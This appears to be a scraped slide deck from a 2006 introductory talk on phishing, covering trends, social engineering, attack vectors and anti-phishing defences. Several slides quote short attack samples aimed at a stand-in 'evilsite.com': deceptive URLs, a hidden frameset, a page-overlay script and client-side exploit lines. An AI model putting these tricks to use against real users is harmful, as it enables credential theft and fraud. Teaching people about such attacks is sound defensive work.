870 likes | 1.15k Views
Talk (III): Introduction to Phishing. Jenq-Haur Wang Academia Sinica Nov. 16-17, 2006. Outline. Introduction Phishing Techniques Anti-Phishing Attempts. Introduction. “Phishing” To “fish” for passwords and financial data from the sea of Internet users
E N D
Talk (III): Introduction to Phishing Jenq-Haur Wang Academia Sinica Nov. 16-17, 2006
Outline • Introduction • Phishing Techniques • Anti-Phishing Attempts Phishing
Introduction • “Phishing” • To “fish” for passwords and financial data from the sea of Internet users • First mentioned on Usenet newsgroup in 1996 • Identity theft • Online fraud Phishing
Why Phishing? • E-commerce sites • Shopping, bidding, … • E-banking (network banking) • Credit card, stock, insurance, … • Low cost • Ex. In Taiwan, [source: http://news.chinatimes.com/Chinatimes/newslist/newslist-content/0,3546,110507+112006111700256,00.html] • Chinatrust Bank: 1 million (20%), 56% • Cathay United Bank: 0.7 million, 50% • Taishin Bank: 0.6 million (1/3) Phishing
References • Wikipedia – Phishing • http://en.wikipedia.org/wiki/Phishing • Anti-Phishing Working Group (APWG) • http://www.antiphishing.org/ • Paper: “The Phishing Guide: Understanding and Preventing Phishing Attacks,” by Gunter Ollmann, available at: http://www.technicalinfo.net/papers/Phishing.html Phishing
Phishing Activity Trend Phishing
Phishing Activity Trend Phishing
Top Used Ports Hosting Phishing Data Collection Servers Phishing
Most Targeted Industry Sectors Phishing
A Closer Look • The most targeted industry sector for phishing attacks: • financial services 73% -> 92.6% • Country hosting the most phishing sites: • US 29% -> 27.88% • [Source: APWG Phishing Activity Trends Report, Oct. 2004 & Aug. 2006] Phishing
Project: Crimeware • Phishing-based Trojans – Keyloggers • Code which is designed with the intent of collecting information on the end-user in order to steal those users’ credentials • Targeted at financial sites, e-commerce sites, or webmail sites • Phishing-based Trojans – Redirectors • Code which is designed with the intent of redirecting end-users network traffic to a location where it was not intended to go to • Spyware Phishing
Damage Caused by Phishing • Identity theft • Loss of personal information • Credit card number, social security number, … • Create fake accounts in a victim’s name, ruin a victim’s credit, prevent victims from accessing their own accounts, … • Financial loss • 1.2 million users in the US, $929 million USD • US businesses lose $2 billion USD per year • In UK web banking frauds, £12.2m in 2004, £23.2m in 2005 • 1/20 users claim to have lost due to phishing in 2005 Phishing
Phishing Message Delivery • Email and spam • Web-based delivery • Instant messaging • Trojaned hosts Phishing
Example – Delivered by E-mail Phishing
Example –Web-based Delivery Phishing
Phishing Examples • PayPal • SouthTrust Bank Phishing
PayPal Phishing
SouthTrust Bank Phishing
Phishing Techniques • Social engineering • Automated attack system Phishing
Some Common Tricks • Misspelled URLs or the use of subdomains • http://www.mybank.com.example.com/ • Making the anchor text for a link appear to be a valid URL when the link actually goes to the phishers' site • http://www.google.com@members.tripod.com/ • Using JavaScript commands in order to alter the address bar • Using a bank or service's own scripts against the victim (cross-site scripting) Phishing
Social Engineering Techniques • Pretexting • The act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone • Phishing • Emails appearing to come from a legitimate business — a bank, or credit card company — requesting "verification" of information and warning of some dire consequence if it is not done Phishing
Social Engineering Techniques • Trojan Horse/Gimmes • Gimmes can arrive as an email attachment promising anything from a cool or sexy screen saver, an important anti-virus or system upgrade, or even the latest dirt on an employee • Quid pro Quo • Latin for “Something for something” • An attacker calls random numbers at a company claiming to be calling back from technical support. Eventually they will hit someone with a legitimate problem, grateful that someone is calling back to help them. The attacker will "help" solve the problem and in the process have the user type commands that give the attacker access and/or launch malware Phishing
Automated Attack Systems • APWG suggested that conventional phishing techniques could become obsolete in the future as people are increasingly aware of the social engineering techniques used by phishers • They propose that pharming and other uses of malware will become more common tools for stealing information Phishing
Phishing Attack Vectors • Man-in-the-middle attacks • URL obfuscation attacks • Cross-site scripting attacks • Preset session attacks • Hidden attacks • Observing customer data • Client-side vulnerability exploitation Phishing
Man-in-the-Middle Attack Phishing
URL Obfuscation • Bad domain names • http://www.mybánk.com/ • Friendly login URLs • http://mybank.com:ebank@evilsite.com/login.htm • Third-party shortened URLs • http://tinyurl.com/xxxxxx • Hostname obfuscation • http://mybank.com:ebank@210.134.161.35/login.htm • URL obfuscation • Escape encoding (%20), Unicode encoding (%uFD3F), … Phishing
Cross-Site Scripting Phishing
Cross-site Scripting (CSS or XSS) • Using custom URL or code injection into a valid web-based application URL or imbedded data field • The result of poor web-application development processes Phishing
Preset Session Attack Phishing
Preset Session Attack • Both HTTP and HTTPS are stateless protocols • The most common way of managing state within applications is through Session Identifiers (SessionID’s) • Cookies, hidden fields or fields contained within page URLs • The phishing message contains a web link to the real application server, but also contains a predefined SessionID field • The attackers system constantly polls the application server for a restricted page using the preset SessionID Phishing
Hidden Attacks • Hidden frames • Overriding page content • Graphical substitution Phishing
Hidden Frames • <frameset rows="100%,*" framespacing="0"><frame name="real" src="http://mybank.com/" scrolling="auto"><frame name="hiddenContent" src="http://evilsite.com/bad.htm" scrolling="auto"></frameset> Phishing
Overriding Page Content • var d = document; d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2"><TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>'); d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');...... Phishing
Graphical Substitution Phishing
Observing Customer Data • Keylogging • Screen grabbing Phishing
Client-side Vulnerability Exploitation • MS Internet Explorer mishandling • location.href=unescape('http://www.mybank.com%01@evilsite.com/phishing/fakepage.htm'); • RealPlayer • <OBJECT ID="RealOneActiveXObject" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5"></OBJECT> // Play a clip and show new status displayfunction clipPlay() {window.parent.external.PlayClip("rtsp://evilsite.com/hackme.rm", "Title=Glorious Day|Artist name=Me Alone")} Phishing
Anti-Phishing Attempts • Legislation • User training • Technical measures Phishing
Legal Actions • On Jan. 26, 2004, the FTC (Federal Trade Commission) filed the first lawsuit against a suspected phisher • Fake AOL webpage • In US, Anti-Phishing Act of 2005 (S.472) • A five-year prison sentence and/or fine for individuals who commit identity theft using falsified corporate websites or e-mails. Phishing
User Training • Contacting the company that is the subject of the email to check that the email is legitimate • Typing in a trusted web address for the company's website into the address bar of their browser • Nearly all legitimate email messages from companies to their customers will contain an item of information that is not readily available to phishers • PayPal, addresses their customers by username • Banks, partial account number • Not always reliable Phishing
Anti-Phishing Software • Acting as a toolbar that displays the real domain name for the visited website • Microsoft IE7 • Mozilla Firefox 2 • Opera 9.1 • Netscape 8.1 • Google Safe Browsing for Firefox • NetCraft toolbar • eBay toolbar • Earthlink ScamBlocker • GeoTrust TrustWatch Phishing
Technical Measures • Client-side • Server-side • Enterprise-level Phishing
1. Client-Side • Desktop protection agents • Email sophistication • Browser capabilities • Digitally signed email • Customer vigilance Phishing
Desktop Protecting Agents • Anti-virus • Personal firewall • Personal anti-spam • Spyware detection Phishing
Functionalities Needed • Ability to detect and block attempts to install malicious software • Ability to identify spam delivery techniques • Ability to update the latest anti-virus and anti-spam signatures • Ability to detect unauthorized connections • Ability to block outbound delivery of sensitive information to suspected malicious parties Phishing